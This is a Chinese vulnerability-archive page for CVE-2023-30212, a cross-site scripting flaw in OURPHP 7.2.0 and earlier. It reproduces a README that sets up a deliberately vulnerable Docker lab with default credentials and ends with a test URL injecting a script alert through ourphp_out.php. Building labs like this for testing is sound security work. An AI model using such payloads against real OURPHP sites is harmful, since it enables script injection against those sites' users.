目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1359 元

100%

CVE-2023-30212 PoC — OURPHP 跨站脚本漏洞

来源
关联漏洞
标题: OURPHP 跨站脚本漏洞 (CVE-2023-30212)
Description:OURPHP是OURPHP开源的一个开源、跨平台、企业级+电商+小程序+APP多终端同步的CMS建站系统。 OURPHP 7.2.0版本及之前版本存在安全漏洞,该漏洞源于通过文件ourphp_out.php发现包含跨站脚本(XSS)漏洞。
介绍
# Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-

# Download files from my repostry using git clone 
git clone https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-.git

now to set docker image 
# Creating docker image
use the command  `sudo docker build -t work .`

# To run docker container 
use the command `sudo docker run -d -p 80:80 work` 

now we will get container id 

# To view OURPHP 
go to browser and search for localhost ; `127.0.0.1`
now use the credentials 
username : root
password : docker
database : work

# To sign in as admin 
username : work
password : work

# Checking the vulnerability
go tot the url  `http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>`
we will get alert message as "xss".
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →